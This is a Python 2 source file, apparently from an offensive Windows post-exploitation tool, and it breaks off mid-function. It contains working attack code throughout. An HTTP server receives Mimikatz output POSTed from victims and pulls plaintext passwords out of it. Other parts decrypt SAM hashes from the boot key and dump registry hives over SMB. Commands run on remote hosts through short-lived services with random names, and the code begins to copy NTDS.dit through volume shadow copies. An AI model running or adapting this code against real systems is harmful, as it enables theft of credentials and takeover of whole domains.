from BaseHTTPServer import BaseHTTPRequestHandler
from argparse import RawTextHelpFormatter
from binascii import unhexlify, hexlify
from Crypto.Cipher import DES, ARC4
from datetime import datetime
from time import ctime, time
from termcolor import cprint, colored
import StringIO
import ntpath
import socket
import hashlib
import BaseHTTPServer
import logging
import argparse
import traceback
import ConfigParser
import random
import sys
import os
import string
PERM_DIR = ''.join(random.sample(string.ascii_letters, 10))
OUTPUT_FILENAME = ''.join(random.sample(string.ascii_letters, 10))
BATCH_FILENAME = ''.join(random.sample(string.ascii_letters, 10)) + '.bat'
SMBSERVER_DIR = 'served_over_smb'
DUMMY_SHARE = 'TMP'
print_error = lambda x: cprint("[-] ", 'red', attrs=['bold'], end=x+'\n')
print_status = lambda x: cprint("[*] ", 'blue', attrs=['bold'], end=x+'\n')
print_succ = lambda x: cprint("[+] ", 'green', attrs=['bold'], end=x+'\n')
print_att = lambda x: cprint(x, 'yellow', attrs=['bold'])
yellow = lambda x: colored(x, 'yellow', attrs=['bold'])
green = lambda x: colored(x, 'green', attrs=['bold'])
red = lambda x: colored(x, 'red', attrs=['bold'])
# Structures
# Taken from http://insecurety.net/?p=768
class SAM_KEY_DATA(Structure):
structure = (
('Revision','<L=0'),
('Length','<L=0'),
('Salt','16s=""'),
('Key','16s=""'),
('CheckSum','16s=""'),
('Reserved','<Q=0'),
)
class DOMAIN_ACCOUNT_F(Structure):
structure = (
('Revision','<L=0'),
('Unknown','<L=0'),
('CreationTime','<Q=0'),
('DomainModifiedCount','<Q=0'),
('MaxPasswordAge','<Q=0'),
('MinPasswordAge','<Q=0'),
('ForceLogoff','<Q=0'),
('LockoutDuration','<Q=0'),
('LockoutObservationWindow','<Q=0'),
('ModifiedCountAtLastPromotion','<Q=0'),
('NextRid','<L=0'),
('PasswordProperties','<L=0'),
('MinPasswordLength','<H=0'),
('PasswordHistoryLength','<H=0'),
('LockoutThreshold','<H=0'),
('Unknown2','<H=0'),
('ServerState','<L=0'),
('ServerRole','<H=0'),
('UasCompatibilityRequired','<H=0'),
('Unknown3','<Q=0'),
('Key0',':', SAM_KEY_DATA),
# Commenting this, not needed and not present on Windows 2000 SP0
# ('Key1',':', SAM_KEY_DATA),
# ('Unknown4','<L=0'),
)
# Great help from here http://www.beginningtoseethelight.org/ntsecurity/index.htm
class USER_ACCOUNT_V(Structure):
structure = (
('Unknown','12s=""'),
('NameOffset','<L=0'),
('NameLength','<L=0'),
('Unknown2','<L=0'),
('FullNameOffset','<L=0'),
('FullNameLength','<L=0'),
('Unknown3','<L=0'),
('CommentOffset','<L=0'),
('CommentLength','<L=0'),
('Unknown3','<L=0'),
('UserCommentOffset','<L=0'),
('UserCommentLength','<L=0'),
('Unknown4','<L=0'),
('Unknown5','12s=""'),
('HomeDirOffset','<L=0'),
('HomeDirLength','<L=0'),
('Unknown6','<L=0'),
('HomeDirConnectOffset','<L=0'),
('HomeDirConnectLength','<L=0'),
('Unknown7','<L=0'),
('ScriptPathOffset','<L=0'),
('ScriptPathLength','<L=0'),
('Unknown8','<L=0'),
('ProfilePathOffset','<L=0'),
('ProfilePathLength','<L=0'),
('Unknown9','<L=0'),
('WorkstationsOffset','<L=0'),
('WorkstationsLength','<L=0'),
('Unknown10','<L=0'),
('HoursAllowedOffset','<L=0'),
('HoursAllowedLength','<L=0'),
('Unknown11','<L=0'),
('Unknown12','12s=""'),
('LMHashOffset','<L=0'),
('LMHashLength','<L=0'),
('Unknown13','<L=0'),
('NTHashOffset','<L=0'),
('NTHashLength','<L=0'),
('Unknown14','<L=0'),
('Unknown15','24s=""'),
('Data',':=""'),
)
class NL_RECORD(Structure):
structure = (
('UserLength','<H=0'),
('DomainNameLength','<H=0'),
('EffectiveNameLength','<H=0'),
('FullNameLength','<H=0'),
('MetaData','52s=""'),
('FullDomainLength','<H=0'),
('Length2','<H=0'),
('CH','16s=""'),
('T','16s=""'),
('EncryptedData',':'),
)
class SAMR_RPC_SID_IDENTIFIER_AUTHORITY(Structure):
structure = (
('Value','6s'),
)
class SAMR_RPC_SID(Structure):
structure = (
('Revision','<B'),
('SubAuthorityCount','<B'),
('IdentifierAuthority',':',SAMR_RPC_SID_IDENTIFIER_AUTHORITY),
('SubLen','_-SubAuthority','self["SubAuthorityCount"]*4'),
('SubAuthority',':'),
)
def formatCanonical(self):
ans = 'S-%d-%d' % (self['Revision'], ord(self['IdentifierAuthority']['Value'][5]))
for i in range(self['SubAuthorityCount']):
ans += '-%d' % ( unpack('>L',self['SubAuthority'][i*4:i*4+4])[0])
return ans
class MimikatzServer(BaseHTTPRequestHandler):
def do_GET(self):
if self.path[1:] in os.listdir('served_over_http'):
self.send_response(200)
self.end_headers()
with open('served_over_http/'+ self.path[1:], 'r') as script:
self.wfile.write(script.read())
elif args.path:
if self.path[1:] == args.path.split('/')[-1]:
self.send_response(200)
self.end_headers()
with open(args.path, 'rb') as rbin:
self.wfile.write(rbin.read())
else:
self.send_response(404)
self.end_headers()
def do_POST(self):
self.send_response(200)
self.end_headers()
length = int(self.headers.getheader('content-length'))
data = self.rfile.read(length)
buf = StringIO.StringIO(data).readlines()
i = 0
while i < len(buf):
if ('Password' in buf[i]) and ('(null)' not in buf[i]):
passw = buf[i].split(':')[1].strip()
domain = buf[i-1].split(':')[1].strip()
user = buf[i-2].split(':')[1].strip()
print_succ('{} Found plain text creds! Domain: {} Username: {} Password: {}'.format(self.client_address[0], yellow(domain), yellow(user), yellow(passw)))
i += 1
credsfile_name = 'Mimikatz-{}-{}.log'.format(self.client_address[0], datetime.now().strftime("%Y-%m-%d_%H:%M:%S"))
with open('logs/' + credsfile_name, 'w') as creds:
creds.write(data)
print_status("{} Saved POST data to {}".format(self.client_address[0], yellow(credsfile_name)))
class SMBServer(Thread):
def __init__(self):
Thread.__init__(self)
def run(self):
# Here we write a mini config for the server
smbConfig = ConfigParser.ConfigParser()
smbConfig.add_section('global')
smbConfig.set('global','server_name','yomama')
smbConfig.set('global','server_os','REDSTAR')
smbConfig.set('global','server_domain','WORKGROUP')
smbConfig.set('global','log_file', 'smb.log')
smbConfig.set('global','credentials_file','')
# Let's add a dummy share
smbConfig.add_section(DUMMY_SHARE)
smbConfig.set(DUMMY_SHARE,'comment','')
smbConfig.set(DUMMY_SHARE,'read only','no')
smbConfig.set(DUMMY_SHARE,'share type','0')
smbConfig.set(DUMMY_SHARE,'path',SMBSERVER_DIR)
# IPC always needed
smbConfig.add_section('IPC$')
smbConfig.set('IPC$','comment','')
smbConfig.set('IPC$','read only','yes')
smbConfig.set('IPC$','share type','3')
smbConfig.set('IPC$','path')
self.smb = smbserver.SMBSERVER(('0.0.0.0',445), config_parser = smbConfig)
self.smb.processConfigFile()
try:
self.smb.serve_forever()
except:
pass
def stop(self):
self.smb.socket.close()
self.smb.server_close()
self._Thread__stop()
class OfflineRegistry:
def __init__(self, hiveFile = None, isRemote = False):
self.__hiveFile = hiveFile
if self.__hiveFile is not None:
self.__registryHive = winregistry.Registry(self.__hiveFile, isRemote)
def enumKey(self, searchKey):
parentKey = self.__registryHive.findKey(searchKey)
if parentKey is None:
return
keys = self.__registryHive.enumKey(parentKey)
return keys
def enumValues(self, searchKey):
key = self.__registryHive.findKey(searchKey)
if key is None:
return
values = self.__registryHive.enumValues(key)
return values
def getValue(self, keyValue):
value = self.__registryHive.getValue(keyValue)
if value is None:
return
return value
def getClass(self, className):
value = self.__registryHive.getClass(className)
if value is None:
return
return value
def finish(self):
if self.__hiveFile is not None:
# Remove temp file and whatever else is needed
self.__registryHive.close()
class SAMHashes(OfflineRegistry):
def __init__(self, samFile, bootKey, isRemote = True):
OfflineRegistry.__init__(self, samFile, isRemote)
self.__samFile = samFile
self.__hashedBootKey = ''
self.__bootKey = bootKey
self.__cryptoCommon = CryptoCommon()
self.__itemsFound = {}
def MD5(self, data):
md5 = hashlib.new('md5')
md5.update(data)
return md5.digest()
def getHBootKey(self):
#logging.debug('Calculating HashedBootKey from SAM')
QWERTY = "!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%\0"
DIGITS = "0123456789012345678901234567890123456789\0"
F = self.getValue(ntpath.join('SAM\Domains\Account','F'))[1]
domainData = DOMAIN_ACCOUNT_F(F)
rc4Key = self.MD5(domainData['Key0']['Salt'] + QWERTY + self.__bootKey + DIGITS)
rc4 = ARC4.new(rc4Key)
self.__hashedBootKey = rc4.encrypt(domainData['Key0']['Key']+domainData['Key0']['CheckSum'])
# Verify key with checksum
checkSum = self.MD5( self.__hashedBootKey[:16] + DIGITS + self.__hashedBootKey[:16] + QWERTY)
if checkSum != self.__hashedBootKey[16:]:
raise Exception('hashedBootKey CheckSum failed, Syskey startup password probably in use! :(')
def __decryptHash(self, rid, cryptedHash, constant):
# Section 2.2.11.1.1 Encrypting an NT or LM Hash Value with a Specified Key
# plus hashedBootKey stuff
Key1,Key2 = self.__cryptoCommon.deriveKey(rid)
Crypt1 = DES.new(Key1, DES.MODE_ECB)
Crypt2 = DES.new(Key2, DES.MODE_ECB)
rc4Key = self.MD5( self.__hashedBootKey[:0x10] + pack("<L",rid) + constant )
rc4 = ARC4.new(rc4Key)
key = rc4.encrypt(cryptedHash)
decryptedHash = Crypt1.decrypt(key[:8]) + Crypt2.decrypt(key[8:])
return decryptedHash
def dump(self):
NTPASSWORD = "NTPASSWORD\0"
LMPASSWORD = "LMPASSWORD\0"
if self.__samFile is None:
# No SAM file provided
return
sam_hashes = []
#logging.info('Dumping local SAM hashes (uid:rid:lmhash:nthash)')
self.getHBootKey()
usersKey = 'SAM\\Domains\\Account\\Users'
# Enumerate all the RIDs
rids = self.enumKey(usersKey)
# Remove the Names item
try:
rids.remove('Names')
except:
pass
for rid in rids:
userAccount = USER_ACCOUNT_V(self.getValue(ntpath.join(usersKey,rid,'V'))[1])
rid = int(rid,16)
V = userAccount['Data']
userName = V[userAccount['NameOffset']:userAccount['NameOffset']+userAccount['NameLength']].decode('utf-16le')
if userAccount['LMHashLength'] == 20:
encLMHash = V[userAccount['LMHashOffset']+4:userAccount['LMHashOffset']+userAccount['LMHashLength']]
else:
encLMHash = ''
if userAccount['NTHashLength'] == 20:
encNTHash = V[userAccount['NTHashOffset']+4:userAccount['NTHashOffset']+userAccount['NTHashLength']]
else:
encNTHash = ''
lmHash = self.__decryptHash(rid, encLMHash, LMPASSWORD)
ntHash = self.__decryptHash(rid, encNTHash, NTPASSWORD)
if lmHash == '':
lmHash = ntlm.LMOWFv1('','')
if ntHash == '':
ntHash = ntlm.NTOWFv1('','')
answer = "%s:%d:%s:%s:::" % (userName, rid, hexlify(lmHash), hexlify(ntHash))
self.__itemsFound[rid] = answer
sam_hashes.append(answer)
return sam_hashes
def export(self, fileName):
if len(self.__itemsFound) > 0:
items = sorted(self.__itemsFound)
fd = open(fileName+'.sam','w+')
for item in items:
fd.write(self.__itemsFound[item]+'\n')
fd.close()
class CryptoCommon:
# Common crypto stuff used over different classes
def transformKey(self, InputKey):
# Section 2.2.11.1.2 Encrypting a 64-Bit Block with a 7-Byte Key
OutputKey = []
OutputKey.append( chr(ord(InputKey[0]) >> 0x01) )
OutputKey.append( chr(((ord(InputKey[0])&0x01)<<6) | (ord(InputKey[1])>>2)) )
OutputKey.append( chr(((ord(InputKey[1])&0x03)<<5) | (ord(InputKey[2])>>3)) )
OutputKey.append( chr(((ord(InputKey[2])&0x07)<<4) | (ord(InputKey[3])>>4)) )
OutputKey.append( chr(((ord(InputKey[3])&0x0F)<<3) | (ord(InputKey[4])>>5)) )
OutputKey.append( chr(((ord(InputKey[4])&0x1F)<<2) | (ord(InputKey[5])>>6)) )
OutputKey.append( chr(((ord(InputKey[5])&0x3F)<<1) | (ord(InputKey[6])>>7)) )
OutputKey.append( chr(ord(InputKey[6]) & 0x7F) )
for i in range(8):
OutputKey[i] = chr((ord(OutputKey[i]) << 1) & 0xfe)
return "".join(OutputKey)
def deriveKey(self, baseKey):
# 2.2.11.1.3 Deriving Key1 and Key2 from a Little-Endian, Unsigned Integer Key
# Let I be the little-endian, unsigned integer.
# Let I[X] be the Xth byte of I, where I is interpreted as a zero-base-index array of bytes.
# Note that because I is in little-endian byte order, I[0] is the least significant byte.
# Key1 is a concatenation of the following values: I[0], I[1], I[2], I[3], I[0], I[1], I[2].
# Key2 is a concatenation of the following values: I[3], I[0], I[1], I[2], I[3], I[0], I[1]
key = pack('<L',baseKey)
key1 = key[0] + key[1] + key[2] + key[3] + key[0] + key[1] + key[2]
key2 = key[3] + key[0] + key[1] + key[2] + key[3] + key[0] + key[1]
return self.transformKey(key1),self.transformKey(key2)
class RemoteFile:
def __init__(self, smbConnection, fileName):
self.__smbConnection = smbConnection
self.__fileName = fileName
self.__tid = self.__smbConnection.connectTree('ADMIN$')
self.__fid = None
self.__currentOffset = 0
def open(self):
self.__fid = self.__smbConnection.openFile(self.__tid, self.__fileName)
def seek(self, offset, whence):
# Implement whence, for now it's always from the beginning of the file
if whence == 0:
self.__currentOffset = offset
def read(self, bytesToRead):
if bytesToRead > 0:
data = self.__smbConnection.readFile(self.__tid, self.__fid, self.__currentOffset, bytesToRead)
self.__currentOffset += len(data)
return data
return ''
def close(self):
if self.__fid is not None:
self.__smbConnection.closeFile(self.__tid, self.__fid)
self.__smbConnection.deleteFile('ADMIN$', self.__fileName)
self.__fid = None
def tell(self):
return self.__currentOffset
def __str__(self):
return "\\\\%s\\ADMIN$\\%s" % (self.__smbConnection.getRemoteHost(), self.__fileName)
class RemoteOperations:
def __init__(self, smbConnection):
self.__smbConnection = smbConnection
self.__smbConnection.setTimeout(5*60)
self.__serviceName = 'RemoteRegistry'
self.__stringBindingWinReg = r'ncacn_np:445[\pipe\winreg]'
self.__rrp = None
self.__regHandle = None
self.__stringBindingSamr = r'ncacn_np:445[\pipe\samr]'
self.__samr = None
self.__domainHandle = None
self.__domainName = None
self.__drsr = None
self.__hDrs = None
self.__NtdsDsaObjectGuid = None
self.__doKerberos = None
self.__bootKey = ''
self.__disabled = False
self.__shouldStop = False
self.__started = False
self.__stringBindingSvcCtl = r'ncacn_np:445[\pipe\svcctl]'
self.__scmr = None
self.__tmpServiceName = None
self.__serviceDeleted = False
self.__batchFile = '%TEMP%\\' + BATCH_FILENAME
self.__shell = '%COMSPEC% /Q /c '
self.__output = '%SYSTEMROOT%\\Temp\\' + OUTPUT_FILENAME
self.__answerTMP = ''
def __connectSvcCtl(self):
rpc = transport.DCERPCTransportFactory(self.__stringBindingSvcCtl)
rpc.set_smb_connection(self.__smbConnection)
self.__scmr = rpc.get_dce_rpc()
self.__scmr.connect()
self.__scmr.bind(scmr.MSRPC_UUID_SCMR)
def __connectWinReg(self):
rpc = transport.DCERPCTransportFactory(self.__stringBindingWinReg)
rpc.set_smb_connection(self.__smbConnection)
self.__rrp = rpc.get_dce_rpc()
self.__rrp.connect()
self.__rrp.bind(rrp.MSRPC_UUID_RRP)
def connectSamr(self, domain):
rpc = transport.DCERPCTransportFactory(self.__stringBindingSamr)
rpc.set_smb_connection(self.__smbConnection)
self.__samr = rpc.get_dce_rpc()
self.__samr.connect()
self.__samr.bind(samr.MSRPC_UUID_SAMR)
resp = samr.hSamrConnect(self.__samr)
serverHandle = resp['ServerHandle']
resp = samr.hSamrLookupDomainInSamServer(self.__samr, serverHandle, domain)
resp = samr.hSamrOpenDomain(self.__samr, serverHandle=serverHandle, domainId=resp['DomainId'])
self.__domainHandle = resp['DomainHandle']
self.__domainName = domain
def __connectDrds(self):
stringBinding = epm.hept_map(self.__smbConnection.getRemoteHost(), drsuapi.MSRPC_UUID_DRSUAPI,
protocol='ncacn_ip_tcp')
rpc = transport.DCERPCTransportFactory(stringBinding)
if hasattr(rpc, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpc.set_credentials(*(self.__smbConnection.getCredentials()))
rpc.set_kerberos(self.__doKerberos)
self.__drsr = rpc.get_dce_rpc()
self.__drsr.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
if self.__doKerberos:
self.__drsr.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
self.__drsr.connect()
self.__drsr.bind(drsuapi.MSRPC_UUID_DRSUAPI)
request = drsuapi.DRSBind()
request['puuidClientDsa'] = drsuapi.NTDSAPI_CLIENT_GUID
drs = drsuapi.DRS_EXTENSIONS_INT()
drs['cb'] = len(drs) #- 4
drs['dwFlags'] = drsuapi.DRS_EXT_GETCHGREQ_V6 | drsuapi.DRS_EXT_GETCHGREPLY_V6 | drsuapi.DRS_EXT_GETCHGREQ_V8 | drsuapi.DRS_EXT_STRONG_ENCRYPTION
drs['SiteObjGuid'] = drsuapi.NULLGUID
drs['Pid'] = 0
drs['dwReplEpoch'] = 0
drs['dwFlagsExt'] = drsuapi.DRS_EXT_RECYCLE_BIN
drs['ConfigObjGUID'] = drsuapi.NULLGUID
drs['dwExtCaps'] = 0
request['pextClient']['cb'] = len(drs)
request['pextClient']['rgb'] = list(str(drs))
resp = self.__drsr.request(request)
self.__hDrs = resp['phDrs']
# Now let's get the NtdsDsaObjectGuid UUID to use when querying NCChanges
resp = drsuapi.hDRSDomainControllerInfo(self.__drsr, self.__hDrs, self.__domainName, 2)
if resp['pmsgOut']['V2']['cItems'] > 0:
self.__NtdsDsaObjectGuid = resp['pmsgOut']['V2']['rItems'][0]['NtdsDsaObjectGuid']
else:
logging.error("Couldn't get DC info for domain %s" % self.__domainName)
raise Exception('Fatal, aborting')
def getDrsr(self):
return self.__drsr
def DRSCrackNames(self, formatOffered=drsuapi.DS_NAME_FORMAT.DS_DISPLAY_NAME,
formatDesired=drsuapi.DS_NAME_FORMAT.DS_FQDN_1779_NAME, name=''):
if self.__drsr is None:
self.__connectDrds()
resp = drsuapi.hDRSCrackNames(self.__drsr, self.__hDrs, 0, formatOffered, formatDesired, (name,))
return resp
def DRSGetNCChanges(self, userEntry):
if self.__drsr is None:
self.__connectDrds()
request = drsuapi.DRSGetNCChanges()
request['hDrs'] = self.__hDrs
request['dwInVersion'] = 8
request['pmsgIn']['tag'] = 8
request['pmsgIn']['V8']['uuidDsaObjDest'] = self.__NtdsDsaObjectGuid
request['pmsgIn']['V8']['uuidInvocIdSrc'] = self.__NtdsDsaObjectGuid
dsName = drsuapi.DSNAME()
dsName['SidLen'] = 0
dsName['Guid'] = drsuapi.NULLGUID
dsName['Sid'] = ''
dsName['NameLen'] = len(userEntry)
dsName['StringName'] = (userEntry + '\x00')
dsName['structLen'] = len(dsName.getData())
request['pmsgIn']['V8']['pNC'] = dsName
request['pmsgIn']['V8']['usnvecFrom']['usnHighObjUpdate'] = 0
request['pmsgIn']['V8']['usnvecFrom']['usnHighPropUpdate'] = 0
request['pmsgIn']['V8']['pUpToDateVecDest'] = NULL
request['pmsgIn']['V8']['ulFlags'] = drsuapi.DRS_INIT_SYNC | drsuapi.DRS_WRIT_REP
request['pmsgIn']['V8']['cMaxObjects'] = 1
request['pmsgIn']['V8']['cMaxBytes'] = 0
request['pmsgIn']['V8']['ulExtendedOp'] = drsuapi.EXOP_REPL_OBJ
request['pmsgIn']['V8']['pPartialAttrSet'] = NULL
request['pmsgIn']['V8']['pPartialAttrSetEx1'] = NULL
request['pmsgIn']['V8']['PrefixTableDest']['pPrefixEntry'] = NULL
return self.__drsr.request(request)
def getDomainUsers(self, enumerationContext=0):
if self.__samr is None:
self.connectSamr(self.getMachineNameAndDomain()[1])
try:
resp = samr.hSamrEnumerateUsersInDomain(self.__samr, self.__domainHandle,
userAccountControl=samr.USER_NORMAL_ACCOUNT | \
samr.USER_WORKSTATION_TRUST_ACCOUNT | \
samr.USER_SERVER_TRUST_ACCOUNT |\
samr.USER_INTERDOMAIN_TRUST_ACCOUNT,
enumerationContext=enumerationContext)
except DCERPCException, e:
if str(e).find('STATUS_MORE_ENTRIES') < 0:
raise
resp = e.get_packet()
return resp
def ridToSid(self, rid):
if self.__samr is None:
self.connectSamr(self.getMachineNameAndDomain()[1])
resp = samr.hSamrRidToSid(self.__samr, self.__domainHandle , rid)
return resp['Sid']
def getMachineNameAndDomain(self):
if self.__smbConnection.getServerName() == '':
# No serverName.. this is either because we're doing Kerberos
# or not receiving that data during the login process.
# Let's try getting it through RPC
rpc = transport.DCERPCTransportFactory(r'ncacn_np:445[\pipe\wkssvc]')
rpc.set_smb_connection(self.__smbConnection)
dce = rpc.get_dce_rpc()
dce.connect()
dce.bind(wkst.MSRPC_UUID_WKST)
resp = wkst.hNetrWkstaGetInfo(dce, 100)
dce.disconnect()
return resp['WkstaInfo']['WkstaInfo100']['wki100_computername'][:-1], resp['WkstaInfo']['WkstaInfo100']['wki100_langroup'][:-1]
else:
return self.__smbConnection.getServerName(), self.__smbConnection.getServerDomain()
def getDefaultLoginAccount(self):
try:
ans = rrp.hBaseRegOpenKey(self.__rrp, self.__regHandle, 'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon')
keyHandle = ans['phkResult']
dataType, dataValue = rrp.hBaseRegQueryValue(self.__rrp, keyHandle, 'DefaultUserName')
username = dataValue[:-1]
dataType, dataValue = rrp.hBaseRegQueryValue(self.__rrp, keyHandle, 'DefaultDomainName')
domain = dataValue[:-1]
rrp.hBaseRegCloseKey(self.__rrp, keyHandle)
if len(domain) > 0:
return '%s\\%s' % (domain,username)
else:
return username
except:
return None
def getServiceAccount(self, serviceName):
try:
# Open the service
ans = scmr.hROpenServiceW(self.__scmr, self.__scManagerHandle, serviceName)
serviceHandle = ans['lpServiceHandle']
resp = scmr.hRQueryServiceConfigW(self.__scmr, serviceHandle)
account = resp['lpServiceConfig']['lpServiceStartName'][:-1]
scmr.hRCloseServiceHandle(self.__scmr, serviceHandle)
if account.startswith('.\\'):
account = account[2:]
return account
except Exception, e:
logging.error(e)
return None
def __checkServiceStatus(self):
# Open SC Manager
ans = scmr.hROpenSCManagerW(self.__scmr)
self.__scManagerHandle = ans['lpScHandle']
# Now let's open the service
ans = scmr.hROpenServiceW(self.__scmr, self.__scManagerHandle, self.__serviceName)
self.__serviceHandle = ans['lpServiceHandle']
# Let's check its status
ans = scmr.hRQueryServiceStatus(self.__scmr, self.__serviceHandle)
if ans['lpServiceStatus']['dwCurrentState'] == scmr.SERVICE_STOPPED:
logging.info('Service %s is in stopped state'% self.__serviceName)
self.__shouldStop = True
self.__started = False
elif ans['lpServiceStatus']['dwCurrentState'] == scmr.SERVICE_RUNNING:
logging.debug('Service %s is already running'% self.__serviceName)
self.__shouldStop = False
self.__started = True
else:
raise Exception('Unknown service state 0x%x - Aborting' % ans['CurrentState'])
# Let's check its configuration if service is stopped, maybe it's disabled :s
if self.__started is False:
ans = scmr.hRQueryServiceConfigW(self.__scmr,self.__serviceHandle)
if ans['lpServiceConfig']['dwStartType'] == 0x4:
logging.info('Service %s is disabled, enabling it'% self.__serviceName)
self.__disabled = True
scmr.hRChangeServiceConfigW(self.__scmr, self.__serviceHandle, dwStartType = 0x3)
logging.info('Starting service %s' % self.__serviceName)
scmr.hRStartServiceW(self.__scmr,self.__serviceHandle)
sleep(1)
def enableRegistry(self):
self.__connectSvcCtl()
self.__checkServiceStatus()
self.__connectWinReg()
def __restore(self):
# First of all stop the service if it was originally stopped
if self.__shouldStop is True:
logging.info('Stopping service %s' % self.__serviceName)
scmr.hRControlService(self.__scmr, self.__serviceHandle, scmr.SERVICE_CONTROL_STOP)
if self.__disabled is True:
logging.info('Restoring the disabled state for service %s' % self.__serviceName)
scmr.hRChangeServiceConfigW(self.__scmr, self.__serviceHandle, dwStartType = 0x4)
if self.__serviceDeleted is False:
# Check again the service we created does not exist, starting a new connection
# Why?.. Hitting CTRL+C might break the whole existing DCE connection
try:
rpc = transport.DCERPCTransportFactory(r'ncacn_np:%s[\pipe\svcctl]' % self.__smbConnection.getRemoteHost())
if hasattr(rpc, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpc.set_credentials(*self.__smbConnection.getCredentials())
rpc.set_kerberos(self.__doKerberos)
self.__scmr = rpc.get_dce_rpc()
self.__scmr.connect()
self.__scmr.bind(scmr.MSRPC_UUID_SCMR)
# Open SC Manager
ans = scmr.hROpenSCManagerW(self.__scmr)
self.__scManagerHandle = ans['lpScHandle']
# Now let's open the service
resp = scmr.hROpenServiceW(self.__scmr, self.__scManagerHandle, self.__tmpServiceName)
service = resp['lpServiceHandle']
scmr.hRDeleteService(self.__scmr, service)
scmr.hRControlService(self.__scmr, service, scmr.SERVICE_CONTROL_STOP)
scmr.hRCloseServiceHandle(self.__scmr, service)
scmr.hRCloseServiceHandle(self.__scmr, self.__serviceHandle)
scmr.hRCloseServiceHandle(self.__scmr, self.__scManagerHandle)
rpc.disconnect()
except Exception, e:
# If service is stopped it'll trigger an exception
# If service does not exist it'll trigger an exception
# So. we just wanna be sure we delete it, no need to
# show this exception message
pass
def finish(self):
self.__restore()
if self.__rrp is not None:
self.__rrp.disconnect()
if self.__drsr is not None:
self.__drsr.disconnect()
if self.__samr is not None:
self.__samr.disconnect()
if self.__scmr is not None:
self.__scmr.disconnect()
def getBootKey(self):
bootKey = ''
ans = rrp.hOpenLocalMachine(self.__rrp)
self.__regHandle = ans['phKey']
for key in ['JD','Skew1','GBG','Data']:
logging.debug('Retrieving class info for %s'% key)
ans = rrp.hBaseRegOpenKey(self.__rrp, self.__regHandle, 'SYSTEM\\CurrentControlSet\\Control\\Lsa\\%s' % key)
keyHandle = ans['phkResult']
ans = rrp.hBaseRegQueryInfoKey(self.__rrp,keyHandle)
bootKey = bootKey + ans['lpClassOut'][:-1]
rrp.hBaseRegCloseKey(self.__rrp, keyHandle)
transforms = [ 8, 5, 4, 2, 11, 9, 13, 3, 0, 6, 1, 12, 14, 10, 15, 7 ]
bootKey = unhexlify(bootKey)
for i in xrange(len(bootKey)):
self.__bootKey += bootKey[transforms[i]]
logging.info('Target system bootKey: 0x%s' % hexlify(self.__bootKey))
return self.__bootKey
def checkNoLMHashPolicy(self):
logging.debug('Checking NoLMHash Policy')
ans = rrp.hOpenLocalMachine(self.__rrp)
self.__regHandle = ans['phKey']
ans = rrp.hBaseRegOpenKey(self.__rrp, self.__regHandle, 'SYSTEM\\CurrentControlSet\\Control\\Lsa')
keyHandle = ans['phkResult']
try:
dataType, noLMHash = rrp.hBaseRegQueryValue(self.__rrp, keyHandle, 'NoLmHash')
except:
noLMHash = 0
if noLMHash != 1:
logging.debug('LMHashes are being stored')
return False
logging.debug('LMHashes are NOT being stored')
return True
def __retrieveHive(self, hiveName):
tmpFileName = ''.join([random.choice(string.letters) for _ in range(8)]) + '.tmp'
ans = rrp.hOpenLocalMachine(self.__rrp)
regHandle = ans['phKey']
try:
ans = rrp.hBaseRegCreateKey(self.__rrp, regHandle, hiveName)
except:
raise Exception("Can't open %s hive" % hiveName)
keyHandle = ans['phkResult']
rrp.hBaseRegSaveKey(self.__rrp, keyHandle, tmpFileName)
rrp.hBaseRegCloseKey(self.__rrp, keyHandle)
rrp.hBaseRegCloseKey(self.__rrp, regHandle)
# Now let's open the remote file, so it can be read later
remoteFileName = RemoteFile(self.__smbConnection, 'SYSTEM32\\'+tmpFileName)
return remoteFileName
def saveSAM(self):
logging.debug('Saving remote SAM database')
return self.__retrieveHive('SAM')
def saveSECURITY(self):
logging.debug('Saving remote SECURITY database')
return self.__retrieveHive('SECURITY')
def __executeRemote(self, data):
self.__tmpServiceName = ''.join([random.choice(string.letters) for _ in range(8)]).encode('utf-16le')
command = self.__shell + 'echo ' + data + ' ^> ' + self.__output + ' > ' + self.__batchFile + ' & ' + self.__shell + self.__batchFile
command += ' & ' + 'del ' + self.__batchFile
self.__serviceDeleted = False
resp = scmr.hRCreateServiceW(self.__scmr, self.__scManagerHandle, self.__tmpServiceName, self.__tmpServiceName, lpBinaryPathName=command)
service = resp['lpServiceHandle']
try:
scmr.hRStartServiceW(self.__scmr, service)
except:
pass
scmr.hRDeleteService(self.__scmr, service)
self.__serviceDeleted = True
scmr.hRCloseServiceHandle(self.__scmr, service)
def __answer(self, data):
self.__answerTMP += data
def __getLastVSS(self):
self.__executeRemote('%COMSPEC% /C vssadmin list shadows')
sleep(5)
tries = 0
while True:
try:
self.__smbConnection.getFile('ADMIN$', 'Temp\\' + OUTPUT_FILENAME, self.__answer)
break
except Exception, e:
if tries > 30:
# We give up
raise Exception('Too many tries trying to list vss shadows')
if str(e).find('SHARING') > 0:
# Stuff didn't finish yet.. wait more
sleep(5)
tries +=1
pass
else:
raise
lines = self.__answerTMP.split('\n')
lastShadow = ''
lastShadowFor = ''
# Let's find the last one
# The string used to search the shadow for drive. Wondering what happens
# in other languages
SHADOWFOR = 'Volume: ('
for line in lines:
if line.find('GLOBALROOT') > 0:
lastShadow = line[line.find('\\\\?'):][:-1]
elif line.find(SHADOWFOR) > 0:
lastShadowFor = line[line.find(SHADOWFOR)+len(SHADOWFOR):][:2]
self.__smbConnection.deleteFile('ADMIN$', 'Temp\\' + OUTPUT_FILENAME)
return lastShadow, lastShadowFor
def saveNTDS(self, ninja=False):
logging.info('Searching for NTDS.dit')
# First of all, let's try to read the target NTDS.dit registry entry
ans = rrp.hOpenLocalMachine(self.__rrp)
regHandle = ans['phKey']
try:
ans = rrp.hBaseRegOpenKey(self.__rrp, self.__regHandle, 'SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters')
keyHandle = ans['phkResult']
except:
# Can't open the registry path, assuming no NTDS on the other end
return None
try:
dataType, dataValue = rrp.hBaseRegQueryValue(self.__rrp, keyHandle, 'DSA Database file')
ntdsLocation = dataValue[:-1]
ntdsDrive = ntdsLocation[:2]
except:
# Can't open the registry path, assuming no NTDS on the other end
return None
rrp.hBaseRegCloseKey(self.__rrp, keyHandle)
rrp.hBaseRegCloseKey(self.__rrp, regHandle)
if ninja is True:
